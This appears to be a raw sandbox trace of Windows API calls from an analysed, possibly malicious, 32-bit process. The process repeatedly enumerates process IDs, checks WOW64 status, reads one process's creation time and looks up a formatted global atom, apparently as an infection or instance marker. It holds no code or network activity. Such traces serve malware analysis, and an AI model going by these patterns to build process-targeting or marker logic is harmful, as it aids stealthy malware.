	[0090.304] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.304] CloseHandle (hObject=0x20c) returned 1
	[0090.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.304] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.304] CloseHandle (hObject=0x20c) returned 1
	[0090.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.378] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.378] CloseHandle (hObject=0x20c) returned 1
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.379] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.379] CloseHandle (hObject=0x20c) returned 1
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.379] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.379] CloseHandle (hObject=0x20c) returned 1
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.379] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.379] CloseHandle (hObject=0x20c) returned 1
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.379] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.379] CloseHandle (hObject=0x20c) returned 1
	[0090.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.379] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.379] CloseHandle (hObject=0x20c) returned 1
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.380] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.380] CloseHandle (hObject=0x20c) returned 1
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.380] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.380] CloseHandle (hObject=0x20c) returned 1
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.380] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.380] CloseHandle (hObject=0x20c) returned 1
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.380] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.380] CloseHandle (hObject=0x20c) returned 1
	[0090.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.380] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.381] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.381] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.381] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.381] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.381] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.381] CloseHandle (hObject=0x20c) returned 1
	[0090.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.382] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.382] CloseHandle (hObject=0x20c) returned 1
	[0090.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.382] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.382] CloseHandle (hObject=0x20c) returned 1
	[0090.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.382] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.382] CloseHandle (hObject=0x20c) returned 1
	[0090.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.382] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.383] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.383] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.383] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.383] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.383] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.383] CloseHandle (hObject=0x20c) returned 1
	[0090.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.384] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.384] CloseHandle (hObject=0x20c) returned 1
	[0090.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.384] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.384] CloseHandle (hObject=0x20c) returned 1
	[0090.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.384] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.384] CloseHandle (hObject=0x20c) returned 1
	[0090.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.384] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.384] CloseHandle (hObject=0x20c) returned 1
	[0090.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.384] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.384] CloseHandle (hObject=0x20c) returned 1
	[0090.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.385] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.385] CloseHandle (hObject=0x20c) returned 1
	[0090.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.385] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.385] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.385] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.385] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.386] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.386] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.386] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.386] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.386] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.387] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.387] CloseHandle (hObject=0x20c) returned 1
	[0090.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.387] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.387] CloseHandle (hObject=0x20c) returned 1
	[0090.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.464] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0090.466] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.466] CloseHandle (hObject=0x20c) returned 1
	[0090.466] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0090.467] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.467] CloseHandle (hObject=0x20c) returned 1
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0090.467] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.467] CloseHandle (hObject=0x20c) returned 1
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0090.467] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.467] CloseHandle (hObject=0x20c) returned 1
	[0090.467] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0090.467] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.467] CloseHandle (hObject=0x20c) returned 1
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0090.468] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.468] CloseHandle (hObject=0x20c) returned 1
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0090.468] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.468] CloseHandle (hObject=0x20c) returned 1
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0090.468] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.468] CloseHandle (hObject=0x20c) returned 1
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0090.468] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.468] CloseHandle (hObject=0x20c) returned 1
	[0090.468] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0090.468] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.468] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.469] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.469] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.469] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.469] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.469] CloseHandle (hObject=0x20c) returned 1
	[0090.469] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0090.469] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0090.470] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0090.470] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0090.470] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0090.470] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0090.470] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.470] CloseHandle (hObject=0x20c) returned 1
	[0090.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.471] CloseHandle (hObject=0x20c) returned 1
	[0090.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.471] CloseHandle (hObject=0x20c) returned 1
	[0090.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.471] CloseHandle (hObject=0x20c) returned 1
	[0090.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.471] CloseHandle (hObject=0x20c) returned 1
	[0090.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.471] CloseHandle (hObject=0x20c) returned 1
	[0090.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0090.471] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.472] CloseHandle (hObject=0x20c) returned 1
	[0090.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0090.472] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.472] CloseHandle (hObject=0x20c) returned 1
	[0090.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0090.472] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.472] CloseHandle (hObject=0x20c) returned 1
	[0090.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0090.472] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.472] CloseHandle (hObject=0x20c) returned 1
	[0090.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.472] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.472] CloseHandle (hObject=0x20c) returned 1
	[0090.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0090.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.473] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0090.473] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0090.473] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0090.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.473] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0090.473] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0090.474] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0090.474] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0090.474] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0090.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0090.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0090.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0090.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0090.474] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.474] CloseHandle (hObject=0x20c) returned 1
	[0090.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0090.474] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0090.474] CloseHandle (hObject=0x20c) returned 1
	[0090.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0090.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0090.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0090.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0090.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
